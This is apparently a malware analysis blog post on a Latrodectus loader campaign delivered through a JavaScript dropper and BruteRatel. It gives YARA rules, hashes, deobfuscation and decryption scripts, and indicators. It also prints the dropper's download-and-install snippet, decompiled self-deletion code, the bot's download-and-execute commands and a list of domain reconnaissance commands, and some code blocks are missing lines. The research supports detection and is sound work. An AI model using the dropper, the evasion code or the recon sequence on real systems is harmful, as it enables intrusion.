Latrodectus dropped by BR4 🕷️
— pboThis article details the last campaign involving Latrodectus malware that is dropped by BruteRatel, some YARA and hunting pivot are also provided.

Context #
Starting point of the analysis is this message on X from Zscaler published on .
🕷️ The initial access broker using #Latrodectus is back! The group has resurrected the malware loader less than a month after #OperationEndgame. #BruteRatel is currently being used to drop Latrodectus.
— Zscaler ThreatLabz (@Threatlabz) June 23, 2024
Sample BruteRatel SHA256 hash:…
Stage 0 (Form_Ver-X-X-X.js) pivot #
Starting from the hash of BruteRatel we found the previous stage JavaScript file. That is overwhelm
of comments. A short JavaScript function is “hidden” in the comment, the function
is used to download and execute an MSI file using ActiveXObject("WindowsInstaller.Installer")
function installFromURL() {
var msiPath;
try {
installer = new ActiveXObject("WindowsInstaller.Installer");
installer.UILevel = 2;
msiPath = "http:85.208.108.]63/BST.msi";
} catch (e) {
First pivot on the variable installer
calling InstallProduct
You can use this YARA for instance:
rule Latrodectus_JS_dropper {
purpose = "hunting"
malware = "latrodectus"
creation_date = "2024-06-25"
description = "JS Dropper that DL and install a BR4 MSI"
classification = "TLP:GREEN"
$s1 = "ActiveXObject"
$s2 = "////// installer.InstallProduct(msiPath);"
condition: all of them
> content:“ActiveXObject” content:"// installer.InstallProduct(msiPath);"
From the above hunting we get 25 JavaScript files:
- 04086187681a0737f44284e2f715e3d90a7284157916cf1ece61cccc6d975227
- 073ed26f17f8efd735ad3f7737e88936f4bf2efd9722a37495874d6dd73ec12d
- 0a12f2ccd4dc561b924c3c88a9571a36fdd01acd12d5a3eca88d2336989fcb89
- 156c0afc01a5e346b95ebdb60cea9b7046ad7a61199cd63d6ad0f4ae32a576ac
- 1e2a94cb10157e71a550fd514c3d3607da6e1d2e3dc59b8aec2b175f8492b182
- 232ec24aa416bd642fdd2eb5d5eae2c72f2dd028b0f5058e193acb656e010f6d
- 23303910ff8d01d4d6e1499a627dfa6006793faf36766e0f1e7b9fdf15fb0715
- 2c63de7f491690900d95080d0741bb8282edfec74e58cdc25e7b9ba3a478e574
- 3af71ac2d92510f3300be025a4bf07069fb668da5fbd664431fc1a2d898a7765
- 51d30f6ac9da41e2124b765e74737fa43a6990657f8e57170cea8d59552ce806
- 5b51c052283b08f981cbab43a7c5fcfe740941317adc6c9d9352291dacfda5f0
- 71a429fdbaa04f8eee80c05b123ba00635569801ca041fdc7c6ac41de8aa72d3
- 921f90caf2fab16a171d850e1191f416774b0385b430cd71b4a0d98c270cc940
- b023037cc1f1dc53d60cd574dbbb09ce1013ef4e299f793e14ad35407d3d5cc7
- babfbd312f46e7deed15f68b4e3d4c6a6492bdcc596aaa946986537d3765b53e
- bb9203ca1305e47a2ec1443a640efcd5e2c7d11223184639729673579e12967e
- da305ed28c974ac82afc57ae365e9955b3237cde4659fb1922de4e72ed42f2b7
- dc4317e2514603f94394c762b7e92a8a693689657641e190efeb2ed24c690525
- e4919fd30fc8ad21a3798684bd9b6104907fa214251ffe6c34dc9ae849c7d1b1
- e57990d251937c5e4b27bf2240a08da37a40399bd3faa75ed67616ac3935f843
- f7382cb88fb68a4fb40c29fd991bd3b1f1933a264a45b4d336289a7e3891f13c
Retrieve all delivery C2:
import os
urls = set()
for _, _, filenames in os.walk(path):
for filename in filenames:
with open(os.path.join(path, filename), "r") as f:
raw_script =
script = []
for line in raw_script.split("\n"):
if line.startswith("////"):
script.append(line.replace("////", ""))
if "msiPath = " in line:
urls.add(line.split(" = ")[-1].replace(";","").replace('"', ''))
return "\n".join(urls)
URL | State |
---|---| |
Down | |
Down | |
UP | |
DOWN | |
DOWN | |
DOWN | |
UP |
Stage1: MSI #
Starting reverse from e57990d251937c5e4b27bf2240a08da37a40399bd3faa75ed67616ac3935f843
(vpn.msi downloaded from hxxp://193.32.]177.192/vpn.msi
The MSI install itself in the AppData
directory and use a custom action to starts the
malicious DLL aclui.dll
by calling the exported function edit

Figure 1: MSI executing a DLL using rundll32
N.B: rundll32.exe aclui.dll, edit
, this is interesting to see a non standard DLL entrypoint edit
The DLL is stored in the MSI in the Files segment, which made its extraction convenient with MSIViewer.
Stage 2 BruteRatel: aclui.dll #
SHA-256: c5dc5fd676ab5b877bc86f88485c29d9f74933f8e98a33bddc29f0f3acc5a5b9. The DLL is executed using rundll32.exe on the export name edit.
Using it detects a BruteRatel c4_a0
sample and returns an
unpacked file that have this SHA-256 hash: 0d3fd08d237f2f22574edf6baf572fa3b15281170f4d14f98433ddeda9f1c5b2
This file is the first stage of BruteRatel which can again be unpack on with the SHA-256 hash: 77a8e883db7da0b905922f7babc79f1c1b78a521b0a31f6d13922bc0603da427
From the last stage of BruteRatel 77a8e883db7da0b905922f7babc79f1c1b78a521b0a31f6d13922bc0603da427 there is
some memory pattern that are related to Latrodectus (URL with /live/
). However at the time of writing ( )
all of the BR4 C2s are down therefore full infection leading to Latrodectus cannot be executed.
A comprehensive and interesting article on this Brute Ratel analysis, which complements the missing part of this article,
has been written by @BlueEye46572843. It was published around the same time and is available on the ANY.RUN blog.
Stage 3: Latrodectus sample analysis #
Overview #
As from the last stage of BR4 we cannot retrieve the Latrodectus DLL, we start analysing a sample from the same campaign (JS->BR4->Latrodectus): SHA-256: d843d0016164e7ee6f56e65683985981fb14093ed79fde8e664b308a43ff4e79
The DLL have 4 exported functions that point to the same address:

Figure 2: Latrodectus exported functions
Dynamic API resolution #
Most of the dynamically imported functions are hashed using the CRC32 algorithm, with only two functions hashed using a different algorithm.
The malware first dynamically resolves various DLLs: kernel32.dll
, Wininet.dll
and ntdll.dll
Each DLL is resolved in a dedicated function, and for each function in the DLL, a structure
, see the definition below) is created and added to an array.
An entry in the api_table
array has the following structure:
struct api {
DWORD funcHash;
HMODULE* hModule;
LPVOID* pFunc;

Figure 3: NTDLL api resolution
The hash are stored in the “normal” representation (crc32), according to article the code come from BlackLotus open source project.
Here is a capture of the function used to obtain the DLL base (_LIST_ENTRY
) of the DLL to load:

Figure 4: DLL dynamic loading function
string obfusatation #
Latrodectus strings are obfuscated using a custom algorithm, each string is stored under a particular structure which has the following shape:
struct latrodectus_string {
DWORD size;
WORD seed;
CHAR[] buff;

Figure 5: Obfuscated string structure
The size of the obfsucated data is the result of a XOR
operation between the key (4 bytes)
and the seed (2 bytes). The malware deobfsucates the string with the function below:

Figure 6: Decompiled function used to deobfuscate Latrodectus string
Here is the Python script to deobfuscate strings:
import struct
def deobfuscate_string(buff: bytes) -> str:
key, seed = struct.unpack("<ih", buff[:6])
size = (key ^ seed) & 0xFF
ciphertext = buff[6 : 6 + size]
cleartext = bytearray(size)
for index in range(size):
key += 1
cleartext[index] = (key ^ ciphertext[index]) & 0xFF
return cleartext.decode("utf-16")
buff = bytes.fromhex(
Here is the IDA script to debofsucate the strings:
Before running it, I needed to decompiled the all program File>Produce>C file
File>Produce>C file
import idautils
import struct
def deobufscate_string(buff: bytes) -> str:
key, seed = struct.unpack("<ih", buff[:6])
size = (key ^ seed) & 0xFF
ciphertext = buff[6 : 6 + size]
cleartext = bytearray(size)
for index in range(size):
key += 1
cleartext[index] = (key ^ ciphertext[index]) & 0xFF
return cleartext
def get_string_length(address):
Get the length of the string at the given address.
:param address: The address of the string.
:return: The length of the string.
string = idc.get_strlit_contents(address)
if string:
return len(string)
return 0
def get_data_length(address: int) -> int:
Get the length of the data at the given address by analyzing the type.
:param address: The address of the data.
:return: The length of the data.
flags = idc.get_full_flags(address)
if idc.is_strlit(flags):
# It's a string
return get_string_length(address)
elif idc.is_data(flags):
# It's some kind of data (e.g., array or structure)
size = idc.get_item_size(address)
return size
return 0
deobfuscution_func_addr = 0x18000AE78 # CHANGE-ME
for ref in idautils.XrefsTo(deobfuscution_func_addr):
for ea in idautils.Heads(ref.frm - 10, ref.frm):
insn = idaapi.insn_t()
length = idaapi.decode_insn(insn, ea)
mnemonic = print_insn_mnem(ea)
if mnemonic == "lea":
operand_1 = print_operand(ea, 0)
operand_2 = print_operand(ea, 1)
addr = get_operand_value(ea, 1)
size = get_data_length(addr)
data = idc.get_bytes(addr, size)
cleartext = ""
cleartext = deobufscate_string(data)
if cleartext.endswith(b"\x00" * 2): # wide detection...
cleartext = cleartext.decode("utf-16")
cleartext = cleartext.decode()
print(f"set comment at 0x{ea:x} : `{cleartext}`")
idc.set_cmt(ea, cleartext, 1)
except Exception as er:
if cleartext:
# idc.set_cmt(ref.frm, cleartext, 0)
print(f"need manual comment 0x{addr:x} {cleartext}")
print(f"error for : 0x{addr:x}")
Additionally, the malware performs a series of environment detection checks,
such as counting the running processes. Based on the OS version, it determines a
threshold range within which the number of running processes is considered acceptable.
It also verify if the flag IsDebugged
in the Process Environment Block is set in cased a debugger
would be attach to the process.
It also verifies that the MAC addresses of the various interfaces have a valid size.
Next, it computes a bot identifier from the volume serial number and then performs a series of
multiplications with a hardcoded constant 0x19660D
. (which has
the same value of the RNG multiply of LCRNG algorithm, because why not…).

Figure 7: botid string formating
A campaign or group identifier is also embedded in the obfuscated strings, this value (deobfuscated) is hashed with FNV-1 algorithm. The current sample respond to the group ID Littlehw
Persistence #
To persiste on the infected host, Latrodectus uses a scheduled task using COM base object.
> msdn logon trigger c++ example
The task is triggered on Logon event.

Figure 8: Function that create the scheduled task using COM object
Here is a way to build the CLSID from the hex data structure exported from the sample
import struct
def bytes_to_clsid(byte_data):
if len(byte_data) != 16:
raise ValueError("A CLSID must be 16 bytes long")
# Unpack bytes according to CLSID structure
part1, part2, part3, part4_and_part5 = struct.unpack('<IHH8s', byte_data[:16])
# Split part4_and_part5 into two parts
part4 = part4_and_part5[:2]
part5 = part4_and_part5[2:8]
part6 = byte_data[8:16]
# Format the CLSID
clsid = f'{{{part1:08X}-{part2:04X}-{part3:04X}-{part4.hex().upper()}-{part5.hex().upper()}{part6.hex().upper()}}}'
# Example usage
byte_data = bytes.fromhex("C7A4AB2FA94D1340969720CC3FD40F85")
This CLSID correspond to the TaskScheduler, I made a script that gather various CLISD retrieved from wine project. More information on how to extract this CLSID in this note and the full script is available here.
Defense evasion #
To hid itself, Latrodectus uses Alternate Data Stream as explain in blogpost The code was borrowed from byt3bl33d3r/OffensiveNim github repository. citation
Latrodectus makes use of a trick to delete itself while the process is still running, making use of an alternative data stream (ADS) and a specific chain of API calls. This technique is used by other malware such as RaspberryRobin, HelloXD Ransomware, DarkPower Ransomware.
The C code used for the self delete is the following one:
__int64 self_delete_withADS()
char v1[8]; // [rsp+40h] [rbp-D8h] BYREF
HANDLE FileW; // [rsp+48h] [rbp-D0h]
int *buff; // [rsp+50h] [rbp-C8h]
unsigned __int64 v4; // [rsp+58h] [rbp-C0h]
unsigned __int64 buff_size; // [rsp+60h] [rbp-B8h]
int *v6; // [rsp+68h] [rbp-B0h]
__int16 *v7; // [rsp+70h] [rbp-A8h]
WCHAR *__attribute__((__org_arrdim(0,0))) v8; // [rsp+78h] [rbp-A0h]
__int16 a2[76]; // [rsp+80h] [rbp-98h] BYREF
if ( !self_filepath )
return 0xFFFFFFFFi64;
FileW = CreateFileW(self_filepath, DELETE, 0, 0i64, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0i64);
return 0xFFFFFFFFi64;
deobfuscate_string(&byte_18000FA18, a2); // :wtfbbq\x00
v7 = a2;
v8 = a2;
v4 = 2i64 * whar::get_length(a2);
buff_size = v4 + 24;
buff = allocate_memory_rwx(v4 + 24);
if ( !buff )
return 0xFFFFFFFFi64;
zero_mem_0(buff, buff_size);
v6 = buff;
buff[4] = v4;
qmemcpy(v6 + 5, v8, v4);
if ( SetFileInformationByHandle(FileW, FileRenameInfo, v6, buff_size) )
FileW = CreateFileW(self_filepath, DELETE, 0, 0i64, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0i64);
return 0xFFFFFFFFi64;
v1[0] = 0;
zero_mem_0(v1, 1ui64);
v1[0] = 1;
if ( SetFileInformationByHandle(FileW, FileDispositionInfo, v1, 1u) )
return 0i64;
return 0xFFFFFFFFi64;
return 0xFFFFFFFFi64;
Command and Control Communication #
The malware uses this user-agent which is unique to this version (or campaign) of Latrodectus. > behavior_network:“Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)”
The malware communicate over HTTPS where the POST data are base64 encoded and its content is RC4
encrypted. The RC4 key is stored obfuscated using the same obfuscation as other strings. In this
sample the key is 12345
The bot understands 4 orders: URLS
. The list of command
is provided in the Table 2. The URLS
updated the list of C2 URLs and CLEARURL
cleaned the C2 URLs
Command ID | Description |
2 | Get desktop files |
3 | List running processes |
4 | fingerprint host & domain |
12 | Download and execute EXE in AppData |
13 | Download and execute DLL in AppData |
14 | Download and execute Shellcode |
15 | Download and update EXE (auto-update) |
17 | Exit process |
18 | Run DLL in AppData (init -zzzz files/bp.dat) |
19 | Increase beacon interval |
20 | Reset counter (number of sended http request) |
Other analysis made on this threat highlight a command ID 21 related to a stealer module, no reference to this ID have been found in this sample. My primary hypothesis is that stealer capability is optional ¯\_(ツ)_/¯.
The bot beacon with its C2 with POST request where the body contains the following fields:
: number of http request send;type
: and id (1 to 5) defining which beacon it is (sysinfo, process list, desktop files);guid
: bot identifier;os
: major version;arch
: fixed to 1 for x64 architecture (otherwise the bot exit if it is another architecture);username
: username of the running process owner;group
: FNV-1 hash of the group (Littlehw
: bot version;up
: a constante;direction
: C2 related information;
To facilitate the decryption of the communication, here is a script to help:
import base64
def rc4(data: str, key: str) -> str:
"""code from OALabs """
x = 0
box = list(range(256))
for i in range(256):
x = (x + box[i] + key[i % len(key)]) % 256
box[i], box[x] = box[x], box[i]
x = 0
y = 0
out = []
for c in data:
x = (x + 1) % 256
y = (y + box[x]) % 256
box[x], box[y] = box[y], box[x]
out.append(c ^ box[(box[x] + box[y]) % 256])
return bytes(out)
buff = b"E3l9I35LXiOWKYHilDWuJoUOTU3NOyjNGnp3muFUOrabzvFw6FpoOQqdBZmsUV5E7FzXWHKgBafR6PcPckBsIB2vIhb3CZ/QHPoEO1hc0A++PpLQjpRWJkK3EFDxH/R5RYjhInO8hc0jTljC91GMVstjkxgQnuZLGBW6AV/gz4VrNMWUxFUtP4fdg/HKCREbRm+gIHkH/7Jc9Q=="
key = b"12345"
print(rc4(base64.b64decode(buff), key).decode())
NB: the command: 4
, where it contains front://
the bot replace the front://
by the value
of the actual C2 URL.
Host & Domain recon #
One of the capacity of the bot is to execute in a dedicated thread a serie of commands to fingerprint the network topology of the infected host and on the connected domain:
ipconfig /all
nltest /domain_trusts
net view /all /domain
nltest /domain_trusts /all_trusts
net view /all
net group "Domain Admins" /domain
/Node:localhost /Namespace:\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
net config workstation
wmic.exe /node:localhost /names
whoami /groups
NB: This method is executed when the bot received the COMMAND
order with the ID 0x4
, c.f: Table 2.
import "pe"
rule latrodectus_exports : TESTING {
version = "1.0"
malware = "Latrodectus"
author = ""
description = "detection based on the DLL exports, this is specific to the BR4 campaign"
creation_date = "2024-07-03"
classification = "TLP:GREEN"
(pe.exports("stow") or pe.exports("homq") or pe.exports("scub")) and pe.number_of_exports >= 3 and uint16(0) == 0x5a4d
Artefacts hunting #
Host artefacts:
directory with the files:update_data.dat
(obfsucated C2 URLs);Update_<8 random characters>.dll
- Mutex
; - Scheduled task named
Network artefacts:
- HTTP User-Agent:
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
; - HTTP POST request on
Latrodectus Update #
Previous version samples:
- 9fad77b6c9968ccf160a20fee17c3ea0d944e91eda9a3ea937027618e2f9e54e
- 9e7fdc17150409d594eeed12705788fbc74b5c7f482a64d121395df781820f46
- 53b0d542af077646bae5740f0b9423be9fb3c32e04623823e19f464c7290242f
Strings obfuscation #
In the previous version of the malware, the string deobfuscation function used a more sophisticated aglorithm PRNG2 with have been removed in the current one…
The encoded strings always starts with 0xf5
byte due to the PRNG2 implementation:

Figure 9: Example of obfsucated string in previous version
BYTE *__fastcall decode_string(WORD *obfuscated_data, BYTE *buff_dest)
BYTE v3; // [rsp+20h] [rbp-18h]
unsigned __int16 i; // [rsp+24h] [rbp-14h]
unsigned __int16 length; // [rsp+28h] [rbp-10h]
int seed; // [rsp+2Ch] [rbp-Ch]
BYTE *ptr_buff_obfuscated; // [rsp+40h] [rbp+8h]
seed = *(_DWORD *)obfuscated_data;
length = obfuscated_data[2] ^ *obfuscated_data;
ptr_buff_obfuscated = (BYTE *)(obfuscated_data + 3);
for ( i = 0; i < (int)length; ++i )
v3 = ptr_buff_obfuscated[i];
seed = prng2(seed);
buff_dest[i] = seed ^ v3;
return buff_dest;
And the PRGN2 decompiled function was:
__int64 __fastcall prng2(int seed)
unsigned __int64 v1; // kr00_8
unsigned int v3; // [rsp+8h] [rbp+8h]
v1 = (unsigned __int64)(((((seed + 0x2E59) << 31) | ((unsigned int)(seed + 0x2E59) >> 1)) << 31) | ((((seed + 0x2E59) << 31) | ((unsigned int)(seed + 0x2E59) >> 1)) >> 1)) << 30;
v3 = ((((unsigned int)v1 | HIDWORD(v1)) ^ 0x151D) >> 0x1E) | (4 * ((v1 | HIDWORD(v1)) ^ 0x151D));
return (v3 >> 31) | (2 * v3);
The medium article from walmartglobaltech IcedID gets Loaded provided a Python implementation of the PRGN2 algorithm:
import struct
import binascii
def mask(a):
return a & 0xFFFFFFFF
def prng2(seed):
temp = mask((seed + 0x2E59))
temp2 = temp >> 1
temp = mask(temp << 0x1F)
temp |= temp2
temp2 = temp >> 1
temp = mask(temp << 0x1F)
temp |= temp2
temp2 = temp >> 2
temp = mask(temp << 0x1E)
temp |= temp2
temp ^= 0x6387
temp ^= 0x769A
temp2 = mask(temp << 2)
temp >>= 0x1E
temp |= temp2
temp2 = mask(temp << 1)
temp >>= 0x1F
temp |= temp2
return temp
def decode(s):
(seed, l) = struct.unpack_from("<IH", s)
l = (l ^ seed) & 0xFFFF
if l > len(s):
return b""
temp = bytearray(s[6 : 6 + l])
for i in range(l):
seed = prng2(seed)
temp[i] = (temp[i] ^ seed) & 0xFF
return temp
string = binascii.unhexlify("F5788452F8781A6EEE4623114A578F9A44B3E10000")